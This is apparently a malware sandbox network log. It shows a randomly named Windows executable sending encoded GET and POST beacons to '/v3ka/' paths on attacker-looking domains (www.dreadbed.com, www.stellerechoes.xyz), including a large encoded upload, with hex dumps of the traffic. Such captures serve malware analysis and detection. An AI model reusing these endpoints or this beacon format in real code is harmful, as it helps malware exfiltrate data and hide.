6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	50284	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:36.382797003 CET	461	OUT	GET /v3ka/?nf8dPP8p=6uRTEcONOSwyaRtqyCIcI/jbJbhdl1D0iGrt2seiEdMiqBKCwYyYvMrO5fxXMQNYUGElLXPpIQYaUrVgpe2t46086L+DcudheMq8m9d90rsu66Tx6HOHsqM=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.dreadbed.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:50:36.700812101 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 28 Feb 2024 14:50:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Set-Cookie: SessionId=e87f77d543c046b5beab40ecb5fddf5d; domain=.www.namecheap.com; path=/; httponly Set-Cookie: x-ncpl-csrf=86c67ad6c13c4493884aa361be46b34f; domain=.www.namecheap.com; path=/; secure; samesite=none X-Proxy-Cache: HIT Server: namecheap-nginx Data Raw: 31 65 38 39 0d 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 65 67 69 73 74 72 61 6e 74 20 57 48 4f 49 53 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 7c 20 4e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6e 63 2d 69 63 6f 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6e 63 5f 6d 61 69 6e 4c 65 67 61 63 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 72 65 74 75 72 6e 20 6e 2e 64 28 65 2c 22 61 22 2c 65 29 2c 65 7d 2c 6e 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 6e 29 7d 2c 6e 2e 70 3d 22 22 2c 6e 28 6e 2e 73 3d 32 37 33 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 33 29 2c 69 3d 65 28 31 Data Ascii: 1e89<html><head lang="en"><meta charset="UTF-8"/><title>Registrant WHOIS contact information verification \| Namecheap.com</title><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="shortcut icon" href="https://www.namecheap.com/assets/img/nc-icon/favicon.ico"/><script type="text/javascript">var nc_mainLegacy=function(t){function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}var e={};return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)\|\|Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},n.p="",n(n.s=273)}([function(t,n,e){var r=e(3),i=e(1
Feb 28, 2024 15:50:36.700891018 CET	1286	IN	Data Raw: 35 29 2c 6f 3d 65 28 31 30 29 2c 61 3d 65 28 31 31 29 2c 75 3d 65 28 31 36 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 63 2c 66 2c 6c 2c 68 2c 70 3d 74 26 73 2e 46 2c 64 3d 74 26 73 2e 47 2c 79 3d 74 26 73 2e 53 2c 76 Data Ascii: 5),o=e(10),a=e(11),u=e(16),s=function(t,n,e){var c,f,l,h,p=t&s.F,d=t&s.G,y=t&s.S,v=t&s.P,g=t&s.B,m=d?r:y?r[n]\|\|(r[n]={}):(r[n]\|\|{}).prototype,b=d?i:i[n]\|\|(i[n]={}),w=b.prototype\|\|(b.prototype={});d&&(e=n);for(c in e)f=!p&&m&&void 0!==m[c],l=(f
Feb 28, 2024 15:50:36.700947046 CET	1286	IN	Data Raw: 66 28 72 28 74 29 2c 6e 3d 6f 28 6e 2c 21 30 29 2c 72 28 65 29 2c 69 29 74 72 79 7b 72 65 74 75 72 6e 20 61 28 74 2c 6e 2c 65 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 67 65 74 22 69 6e 20 65 7c 7c 22 73 65 74 22 69 6e 20 65 29 74 68 72 6f Data Ascii: f(r(t),n=o(n,!0),r(e),i)try{return a(t,n,e)}catch(t){}if("get"in e\|\|"set"in e)throw TypeError("Accessors not supported!");return"value"in e&&(t[n]=e.value),t}},function(t,n,e){t.exports=!e(2)(function(){return 7!=Object.defineProperty({},"a",{
Feb 28, 2024 15:50:36.701006889 CET	1286	IN	Data Raw: 6e 20 6e 21 3d 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7c 7c 6e 2e 73 70 6c 69 74 28 27 22 27 29 2e 6c 65 6e 67 74 68 3e 33 7d 29 2c 22 53 74 72 69 6e 67 22 2c 65 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 65 3d 4d Data Ascii: n n!==n.toLowerCase()\|\|n.split('"').length>3}),"String",e)}},function(t,n){var e=Math.ceil,r=Math.floor;t.exports=function(t){return isNaN(t=+t)?0:(t>0?r:e)(t)}},function(t,n){var e=t.exports={version:"2.5.7"};"number"==typeof __e&&(__e=e)},fu
Feb 28, 2024 15:50:36.701061010 CET	1286	IN	Data Raw: 61 72 20 65 3d 31 3d 3d 74 2c 73 3d 32 3d 3d 74 2c 63 3d 33 3d 3d 74 2c 66 3d 34 3d 3d 74 2c 6c 3d 36 3d 3d 74 2c 68 3d 35 3d 3d 74 7c 7c 6c 2c 70 3d 6e 7c 7c 75 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 75 2c 64 29 7b 66 6f 72 28 Data Ascii: ar e=1==t,s=2==t,c=3==t,f=4==t,l=6==t,h=5==t\|\|l,p=n\|\|u;return function(n,u,d){for(var y,v,g=o(n),m=i(g),b=r(u,d,3),w=a(m.length),S=0,M=e?p(n,w):s?p(n,0):void 0;w>S;S++)if((h\|\|S in m)&&(y=m[S],v=b(y,S,g),t))if(e)M[S]=v;else if(v)switch(t){case
Feb 28, 2024 15:50:36.701113939 CET	1286	IN	Data Raw: 29 2c 76 3d 65 28 31 30 36 29 2c 67 3d 65 28 33 30 29 2c 6d 3d 65 28 32 35 29 2c 62 3d 65 28 31 32 29 2c 77 3d 65 28 35 32 29 2c 53 3d 65 28 31 29 2c 4d 3d 65 28 39 29 2c 6b 3d 65 28 37 33 29 2c 78 3d 65 28 33 33 29 2c 45 3d 65 28 33 35 29 2c 54 Data Ascii: ),v=e(106),g=e(30),m=e(25),b=e(12),w=e(52),S=e(1),M=e(9),k=e(73),x=e(33),E=e(35),T=e(34).f,_=e(74),j=e(26),A=e(5),O=e(23),F=e(43),P=e(77),N=e(99),D=e(45),K=e(54),R=e(38),I=e(75),B=e(98),z=e(7),C=e(27),L=z.f,q=C.f,J=i.RangeError,W=i.TypeError,G
Feb 28, 2024 15:50:36.701167107 CET	1286	IN	Data Raw: 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 66 3d 73 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 2c 6c 3d 76 6f 69 64 20 30 21 3d 3d 66 2c 68 3d 5f 28 75 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 68 26 26 21 6b 28 68 29 29 7b 66 6f 72 Data Ascii: ents.length,f=s>1?arguments[1]:void 0,l=void 0!==f,h=_(u);if(void 0!=h&&!k(h)){for(a=h.call(u),r=[],n=0;!(o=a.next()).done;n++)r.push(o.value);u=r}for(l&&s>2&&(f=c(f,arguments[2],2)),n=0,e=y(u.length),i=Tt(this,e);e>n;n++)i[n]=l?f(u[n],n):u[n]
Feb 28, 2024 15:50:36.701220989 CET	1286	IN	Data Raw: 69 73 29 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 74 28 45 74 28 74 68 69 73 29 2c 74 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b Data Ascii: is),arguments)},map:function(t){return St(Et(this),t,arguments.length>1?arguments[1]:void 0)},reduce:function(t){return ut.apply(Et(this),arguments)},reduceRight:function(t){return st.apply(Et(this),arguments)},reverse:function(){for(var t,n=t
Feb 28, 2024 15:50:36.701273918 CET	1286	IN	Data Raw: 7d 3b 6d 74 7c 7c 28 43 2e 66 3d 7a 74 2c 7a 2e 66 3d 43 74 29 2c 61 28 61 2e 53 2b 61 2e 46 2a 21 6d 74 2c 22 4f 62 6a 65 63 74 22 2c 7b 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3a 7a 74 2c 64 65 66 69 6e 65 50 72 Data Ascii: };mt\|\|(C.f=zt,z.f=Ct),a(a.S+a.F*!mt,"Object",{getOwnPropertyDescriptor:zt,defineProperty:Ct}),o(function(){ht.call({})})&&(ht=pt=function(){return ct.call(this)});var Lt=p({},Dt);p(Lt,It),h(Lt,dt,It.values),p(Lt,{slice:Kt,set:Rt,constructor:fu
Feb 28, 2024 15:50:36.701335907 CET	1286	IN	Data Raw: 74 72 75 63 74 6f 72 22 2c 64 29 29 3a 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 31 29 7d 29 26 26 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 65 77 20 64 28 2d 31 29 7d 29 26 26 4b 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 65 77 20 64 2c 6e 65 Data Ascii: tructor",d)):o(function(){d(1)})&&o(function(){new d(-1)})&&K(function(t){new d,new d(null),new d(1.5),new d(t)},!0)\|\|(d=e(function(t,e,r,i){f(t,d,c);var o;return S(e)?e instanceof U\|\|"ArrayBuffer"==(o=w(e))\|\|"SharedArrayBuffer"==o?void 0!==i?
Feb 28, 2024 15:50:36.941021919 CET	1286	IN	Data Raw: 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 31 34 29 2c 69 3d 4d 61 74 68 2e 6d 61 78 2c 6f 3d 4d 61 74 68 2e 6d 69 6e 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 3d 72 28 74 29 2c Data Ascii: on(t,n,e){var r=e(14),i=Math.max,o=Math.min;t.exports=function(t,n){return t=r(t),t<0?i(t+n,0):o(t,n)}},function(t,n){t.exports=!1},function(t,n,e){var r=e(26)("meta"),i=e(1),o=e(12),a=e(7).f,u=0,s=Object.isExtensible\|\|function(){return!0},c=!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	50285	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:42.624191046 CET	739	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.stellerechoes.xyz Origin: http://www.stellerechoes.xyz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.stellerechoes.xyz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 52 6c 72 6f 42 73 59 62 31 30 52 64 39 5a 63 75 43 2f 56 4f 37 2f 33 4f 32 31 6e 44 55 48 37 36 79 46 6f 4c 6b 72 76 62 33 76 31 62 50 42 4c 52 48 44 74 6f 2f 74 45 53 2b 2b 6c 78 36 58 64 68 67 62 4c 59 36 6c 59 59 32 39 74 39 58 6e 36 6a 72 51 4d 66 53 53 5a 33 41 73 75 47 6a 36 77 37 72 79 72 67 43 54 73 7a 4d 54 38 79 5a 57 45 78 73 61 36 4d 45 73 34 4d 58 62 43 70 6b 58 55 75 56 49 72 75 4f 4e 64 4a 61 45 6f 4a 46 4b 6f 30 42 41 47 4c 59 4c 77 34 37 42 4f 41 35 55 64 34 6f 35 42 72 5a 7a 42 62 50 37 6f 78 6a 65 2f 52 6f 51 65 6b 51 3d 3d Data Ascii: nf8dPP8p=LH3rHLbXIwT+CRlroBsYb10Rd9ZcuC/VO7/3O21nDUH76yFoLkrvb3v1bPBLRHDto/tES++lx6XdhgbLY6lYY29t9Xn6jrQMfSSZ3AsuGj6w7ryrgCTszMT8yZWExsa6MEs4MXbCpkXUuVIruONdJaEoJFKo0BAGLYLw47BOA5Ud4o5BrZzBbP7oxje/RoQekQ==
Feb 28, 2024 15:50:42.900127888 CET	169	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 28 Feb 2024 14:50:42 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	50286	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:45.345082998 CET	1079	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.stellerechoes.xyz Origin: http://www.stellerechoes.xyz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.stellerechoes.xyz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 79 39 72 71 69 45 59 54 31 30 53 44 74 5a 63 6e 69 2f 5a 4f 37 7a 33 4f 33 77 67 44 68 58 37 37 58 68 6f 4b 6d 44 76 61 33 76 31 44 2f 42 4b 66 6e 44 32 6f 2f 52 36 53 2f 43 6c 78 36 7a 64 7a 6a 6a 4c 65 4b 6c 62 51 57 39 69 2b 58 6e 37 79 62 51 57 66 53 50 32 33 46 4d 75 48 53 57 77 36 6f 61 72 6c 57 48 74 33 73 54 36 37 35 57 46 36 4d 61 67 4d 45 70 48 4d 57 69 33 70 57 4c 55 76 30 6f 72 76 4f 4e 61 51 61 46 42 4c 46 4c 36 35 7a 6c 49 44 36 6a 4d 78 34 68 56 41 71 41 37 31 6f 74 2f 73 34 79 37 48 38 6a 69 30 77 61 67 64 38 42 37 6d 42 6c 6c 6b 65 65 6e 50 46 76 34 41 2f 51 66 62 73 6a 6e 7a 6e 53 72 55 56 6b 53 77 6c 46 54 50 4b 49 62 67 33 55 4c 65 35 74 49 74 39 6e 51 6a 74 4f 31 46 6a 2b 46 59 41 59 39 68 70 37 43 43 6a 77 45 76 58 57 76 75 48 45 70 4d 74 77 44 51 6e 50 55 6d 37 4d 4d 6c 70 65 62 45 4d 71 6e 4d 39 37 70 64 77 37 45 61 44 68 49 31 46 38 35 57 39 39 50 4a 41 77 4d 48 47 76 31 62 69 32 37 48 72 35 6a 4e 36 58 67 39 4a 6e 53 4e 6f 63 4d 77 4a 4f 58 48 69 58 78 41 70 4b 6f 5a 4b 33 71 38 71 4c 30 79 68 56 4f 7a 6b 62 54 43 4f 74 4c 41 57 6d 6b 64 31 44 6d 52 74 50 36 55 68 4c 5a 35 6e 58 35 6e 6d 4c 50 31 57 44 41 53 76 73 75 41 32 4d 69 31 58 38 2b 78 6d 4a 71 72 32 42 4b 4e 48 6b 6b 4e 71 30 6b 57 37 45 4f 4d 6a 44 32 4a 38 4f 77 74 57 34 7a 35 56 6d 63 51 4f 4a 57 57 51 39 54 43 35 42 46 35 30 4f 68 48 34 2f 53 7a 73 70 30 34 66 32 6f 41 6e 46 6a 45 76 6f 52 74 63 6b 56 44 34 46 65 6e 55 33 4e 7a 55 70 67 4a 69 48 56 34 39 55 61 47 61 58 31 51 6c 4f 63 50 6a 62 6e 70 43 52 38 48 70 37 6f 73 74 44 62 6d 6c 38 79 78 74 45 3d Data Ascii: nf8dPP8p=LH3rHLbXIwT+Cy9rqiEYT10SDtZcni/ZO7z3O3wgDhX77XhoKmDva3v1D/BKfnD2o/R6S/Clx6zdzjjLeKlbQW9i+Xn7ybQWfSP23FMuHSWw6oarlWHt3sT675WF6MagMEpHMWi3pWLUv0orvONaQaFBLFL65zlID6jMx4hVAqA71ot/s4y7H8ji0wagd8B7mBllkeenPFv4A/QfbsjnznSrUVkSwlFTPKIbg3ULe5tIt9nQjtO1Fj+FYAY9hp7CCjwEvXWvuHEpMtwDQnPUm7MMlpebEMqnM97pdw7EaDhI1F85W99PJAwMHGv1bi27Hr5jN6Xg9JnSNocMwJOXHiXxApKoZK3q8qL0yhVOzkbTCOtLAWmkd1DmRtP6UhLZ5nX5nmLP1WDASvsuA2Mi1X8+xmJqr2BKNHkkNq0kW7EOMjD2J8OwtW4z5VmcQOJWWQ9TC5BF50OhH4/Szsp04f2oAnFjEvoRtckVD4FenU3NzUpgJiHV49UaGaX1QlOcPjbnpCR8Hp7ostDbml8yxtE=
Feb 28, 2024 15:50:45.616864920 CET	169	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 28 Feb 2024 14:50:45 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	50287	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:48.070561886 CET	9002	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.stellerechoes.xyz Origin: http://www.stellerechoes.xyz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.stellerechoes.xyz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 79 39 72 71 69 45 59 54 31 30 53 44 74 5a 63 6e 69 2f 5a 4f 37 7a 33 4f 33 77 67 44 68 66 37 36 6b 5a 6f 49 41 4c 76 4c 48 76 31 64 50 42 50 66 6e 44 33 6f 2f 35 6d 53 2f 4f 66 78 34 37 64 7a 51 4c 4c 65 2f 35 62 46 6d 39 6a 37 58 6e 35 6a 72 52 58 66 53 53 33 33 46 59 68 47 6a 69 77 37 71 43 72 67 6b 76 73 37 63 54 38 37 35 57 42 2b 4d 61 6f 4d 45 6b 61 4d 58 65 33 70 56 76 55 75 48 51 72 74 5a 52 61 4b 61 46 41 59 6c 4c 70 7a 54 6c 70 44 37 48 79 78 34 68 46 41 72 45 37 31 75 74 2f 74 2f 65 36 48 63 6a 69 37 67 61 68 5a 38 46 33 6d 42 49 32 6b 65 47 6e 50 44 50 34 61 66 51 66 51 74 6a 6b 68 48 53 74 43 6c 6b 4a 36 31 4a 62 50 4c 73 58 67 32 67 4c 65 4e 39 49 73 4b 54 51 68 50 32 31 49 6a 2b 62 48 51 5a 6e 34 35 36 44 43 6a 68 74 76 57 32 5a 75 47 73 70 4d 4d 38 44 57 47 50 56 32 4c 4d 4f 70 4a 65 43 56 63 33 6d 4d 39 4c 4c 64 77 36 62 61 48 35 49 31 31 4d 35 59 66 56 49 4b 51 77 4c 65 32 76 6b 56 43 4b 78 48 6f 4e 64 4e 37 2f 77 39 4c 4c 53 66 59 63 4d 31 71 6d 55 4e 53 58 32 4d 4a 4b 41 55 71 33 39 38 71 50 4f 79 6b 74 77 7a 51 72 54 4e 61 4a 4c 45 47 6d 72 59 56 44 69 66 4e 50 38 43 68 4c 5a 35 6e 62 4c 6e 6d 58 50 31 6a 76 41 41 73 59 75 46 6c 55 69 6d 48 38 34 78 6d 4a 37 72 32 4d 30 4e 48 73 4b 4e 72 6c 44 57 35 49 4f 50 77 4c 32 49 2b 6d 33 6f 6d 34 72 7a 31 6e 55 49 75 46 4e 57 51 68 62 43 34 78 56 35 6d 4b 68 56 49 76 53 33 73 70 37 7a 66 32 76 51 58 45 71 56 2f 55 4e 74 63 34 46 44 35 67 44 6e 58 33 4e 2f 53 34 6a 5a 54 50 72 73 73 6f 4f 61 6f 58 74 63 58 75 6c 46 51 76 79 70 41 46 44 42 4f 76 33 73 75 43 56 31 47 78 32 70 49 31 63 62 74 4d 56 35 79 4c 49 6a 67 7a 44 4e 71 53 69 6c 57 62 37 6c 6a 69 73 44 4d 61 45 39 74 33 4f 34 70 58 6e 43 68 65 75 52 43 4f 4e 65 45 72 33 32 36 49 62 79 52 7a 75 6f 45 4e 6d 68 74 43 58 34 57 45 47 72 4d 4c 54 78 39 61 77 4f 2b 65 4f 79 42 66 50 67 68 57 32 41 6c 47 35 35 38 7a 75 39 67 35 42 7a 78 53 55 7a 47 63 52 4f 34 63 61 63 55 70 4c 4c 63 47 50 63 30 6d 76 77 4b 65 31 39 7a 41 41 31 57 5a 33 66 74 41 6d 4c 74 63 53 4f 76 5a 51 2b 46 6c 6d 6c 64 34 57 6a 65 7a 59 50 76 4b 31 4d 34 78 4b 4a 37 30 55 46 4e 79 66 6a 58 50 6f 61 49 78 42 2f 39 2b 6f 59 4e 46 76 4b 45 66 77 57 66 4a 71 5a 7a 6e 4f 73 6f 38 66 71 47 36 74 65 65 72 38 54 66 6e 74 72 76 68 72 35 6b 39 34 34 70 33 42 38 4d 35 42 71 4e 51 61 79 34 4b 61 65 6e 71 68 4c 42 55 48 4d 4a 6a 5a 2f 35 45 70 52 78 30 2b 74 66 59 73 68 52 76 52 6c 6f 37 36 48 66 44 38 57 36 79 45 41 78 7a 4e 77 4a 34 6c 37 41 75 61 4f 4c 57 42 6e 4f 46 34 68 33 5a 53 2b 48 75 34 56 71 53 73 6b 65 76 2b 6d 55 2f 46 78 36 7a 75 45 6f 69 73 4d 72 41 6e 58 67 66 43 33 62 79 68 6a 59 57 79 65 62 68 36 70 44 6f 53 4a 2f 78 65 65 4b 5a 6f 52 31 48 6b 48 41 55 39 37 33 32 46 37 77 6f 37 50 65 69 59 42 46 70 5a 50 76 4f 49 6a 49 2b 70 56 6d 5a 47 42 69 6b 65 65 32 5a 4c 6f 53 34 59 41 2b 61 48 4f 44 45 6e 31 74 78 72 49 64 49 73 51 73 4a 66 70 43 46 51 6f 6c 76 49 45 52 48 5a 59 36 5a 33 4d 6a 39 67 59 6b 74 35 6e 2b 66 54 36 49 72 62 58 4e 43 59 6e 42 68 69 75 75 79 65 4b 2b 55 6e 67 42 45 50 76 43 72 68 63 77 52 2b 68 6f 39 69 51 5a 35 4d 61 76 41 75 72 50 6c 6c 44 58 64 6a 32 4c 51 46 6c 44 78 59 68 47 6f 50 62 68 37 31 2f 45 35 42 59 70 74 4c 66 35 59 34 34 30 64 6c 36 64 61 45 62 54 73 73 41 65 65 46 52 73 50 65 66 4c 70 50 4f 35 70 46 39 70 67 4c 38 46 54 4d 6e 53 7a 51 72 51 64 56 2f 65 51 76 32 79 35 5a 4b 68 4d 59 5a 4e 70 44 2f 77 59 38 6e 4d 73 2f 51 38 76 58 73 4e 36 2b 57 56 67 46 6e 78 68 51 6d 48 4a 58 6d 50 4a 62 54 75 64 68 4f 46 51 48 6a 69 46 73 45 4d 56 49 42 61 59 56 4f 74 65 6a 4b 72 78 75 4d 6a 6b 32 41 5a 50 4d 70 67 30 33 6f 75 78 31 51 63 71 38 66 68 48 6b 6c 39 4e 50 6b 39 64 74 42 52 64 74 43 4a 71 6a 68 47 48 35 46 75 44 50 41 36 6c 33 67 38 6f 64 48 45 4e 30 38 32 71 71 2f 35 53 74 6f 34 72 70 7a 72 45 61 73 76 66 4d 41 33 76 36 30 43 37 4a 55 61 54 77 69 67 4e 70 4c 4c 5a 71 77 62 58 59 4f 46 64 4d 4d 6b 30 49 6c 4b 75 41 76 45 6d 30 7a 2f 4d 2b 6f 37 30 7a 30 66 63 51 51 47 76 49 48 77 42 2f 70 31 62 6a 4c 49 55 79 50 6c 56 31 36 58 66 69 44 6f Data Ascii: 